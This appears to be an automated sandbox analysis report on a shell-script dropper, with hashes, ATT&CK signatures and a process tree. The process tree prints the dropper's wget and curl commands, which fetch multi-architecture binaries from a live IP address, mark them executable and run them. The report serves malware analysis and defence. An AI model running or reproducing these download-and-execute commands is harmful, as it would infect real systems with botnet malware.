f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1

Analysis

max time kernel
8s
max time network
9s
platform
debian-9_armhf
resource
debian9-armhf-20240729-en
resource tags

arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
21/11/2024, 08:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
Size

1KB
MD5

0b5a60057fc9d9ce95ba5cdaab501e68
SHA1

879040e7114865f81dbd3f2fb41409e0cb3b8966
SHA256

f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1
SHA512

d97b13f656458456b934ab1cdc205ec4efedebfa8ee98675ba38865e916563487d1fd5c649afad7376f469a60ecd16b7c502c549ac095d8be234f6d9e876f351

Score

7^/10

antivm defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 10 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
727	chmod
768	chmod
681	chmod
687	chmod
692	chmod
703	chmod
670	chmod
715	chmod
740	chmod
756	chmod

Executes dropped EXE 10 IoCs

ioc	pid	Process
/tmp/3AvA	672	3AvA
/tmp/3AvA	683	3AvA
/tmp/3AvA	688	3AvA
/tmp/3AvA	693	3AvA
/tmp/3AvA	705	3AvA
/tmp/3AvA	717	3AvA
/tmp/3AvA	729	3AvA
/tmp/3AvA	741	3AvA
/tmp/3AvA	758	3AvA
/tmp/3AvA	769	3AvA

Checks CPU configuration 1 TTPs 10 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 20 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 4 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
673	wget
677	curl
680	cat
683	3AvA

Writes file to tmp directory 11 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/3AvA	f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
File opened for modification	/tmp/IGxModz.mpsl	curl
File opened for modification	/tmp/IGxModz.arm4	curl
File opened for modification	/tmp/IGxModz.arm7	curl
File opened for modification	/tmp/IGxModz.ppc	curl
File opened for modification	/tmp/IGxModz.sh4	curl
File opened for modification	/tmp/IGxModz.x86	curl
File opened for modification	/tmp/IGxModz.mips	curl
File opened for modification	/tmp/IGxModz.arm5	curl
File opened for modification	/tmp/IGxModz.arm6	curl
File opened for modification	/tmp/IGxModz.m68k	curl

/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
1⤵
- Writes file to tmp directory
PID:647
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.x86
  2⤵
  PID:649
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:659
- /bin/cat
  cat IGxModz.x86
  2⤵
  PID:669
- /bin/chmod
  chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE
  2⤵
  - File and Directory Permissions Modification
  PID:670
- /tmp/3AvA
  ./3AvA x86
  2⤵
  - Executes dropped EXE
  PID:672
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.mips
  2⤵
  - System Network Configuration Discovery
  PID:673
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.mips
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:677
- /bin/cat
  cat IGxModz.mips
  2⤵
  - System Network Configuration Discovery
  PID:680
- /bin/chmod
  chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE
  2⤵
  - File and Directory Permissions Modification
  PID:681
- /tmp/3AvA
  ./3AvA mips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:683
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.mpsl
  2⤵
  PID:684
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.mpsl
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:685
- /bin/cat
  cat IGxModz.mpsl
  2⤵
  PID:686
- /bin/chmod
  chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE
  2⤵
  - File and Directory Permissions Modification
  PID:687
- /tmp/3AvA
  ./3AvA mpsl
  2⤵
  - Executes dropped EXE
  PID:688
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.arm4
  2⤵
  PID:689
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.arm4
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:690
- /bin/cat
  cat IGxModz.arm4
  2⤵
  PID:691
- /bin/chmod
  chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE
  2⤵
  - File and Directory Permissions Modification
  PID:692
- /tmp/3AvA
  ./3AvA arm4
  2⤵
  - Executes dropped EXE
  PID:693
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.arm5
  2⤵
  PID:694
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.arm5
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:698
- /bin/cat
  cat IGxModz.arm5
  2⤵
  PID:702
- /bin/chmod
  chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE
  2⤵
  - File and Directory Permissions Modification
  PID:703
- /tmp/3AvA
  ./3AvA arm5
  2⤵
  - Executes dropped EXE
  PID:705
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.arm6
  2⤵
  PID:706
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.arm6
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:710
- /bin/cat
  cat IGxModz.arm6
  2⤵
  PID:714
- /bin/chmod
  chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE
  2⤵
  - File and Directory Permissions Modification
  PID:715
- /tmp/3AvA
  ./3AvA arm6
  2⤵
  - Executes dropped EXE
  PID:717
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.arm7
  2⤵
  PID:718
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.arm7
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:721
- /bin/cat
  cat IGxModz.arm7
  2⤵
  PID:726
- /bin/chmod
  chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE
  2⤵
  - File and Directory Permissions Modification
  PID:727
- /tmp/3AvA
  ./3AvA arm7
  2⤵
  - Executes dropped EXE
  PID:729
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.ppc
  2⤵
  PID:730
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.ppc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:733
- /bin/cat
  cat IGxModz.ppc
  2⤵
  PID:738
- /bin/chmod
  chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE
  2⤵
  - File and Directory Permissions Modification
  PID:740
- /tmp/3AvA
  ./3AvA ppc
  2⤵
  - Executes dropped EXE
  PID:741
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.m68k
  2⤵
  PID:742
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.m68k
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:746
- /bin/cat
  cat IGxModz.m68k
  2⤵
  PID:754
- /bin/chmod
  chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE
  2⤵
  - File and Directory Permissions Modification
  PID:756
- /tmp/3AvA
  ./3AvA m68k
  2⤵
  - Executes dropped EXE
  PID:758
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.sh4
  2⤵
  PID:759
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.sh4
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:762
- /bin/cat
  cat IGxModz.sh4
  2⤵
  PID:767
- /bin/chmod
  chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.sh4 IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE
  2⤵
  - File and Directory Permissions Modification
  PID:768
- /tmp/3AvA
  ./3AvA sh4
  2⤵
  - Executes dropped EXE
  PID:769

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/IGxModz.x86

Filesize
276B

MD5
960b4fa9d5383373f0a1ea04929df01b

SHA1
f78054d817db7742162a706b5d9f1fedcdf21140

SHA256
3e3036a7715bae7bda5c0b2de74731a835b869ded4d470cddb7f6521114aca7a

SHA512
2d5c6ad2bb0f8a8b971d759e3618e8636034cee5b76c362c2107b7fadc38bcaabbaa79cd19f5f2e949005e3d128b1a4efff187d1a3f035791dcbd1255b7ed73f

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads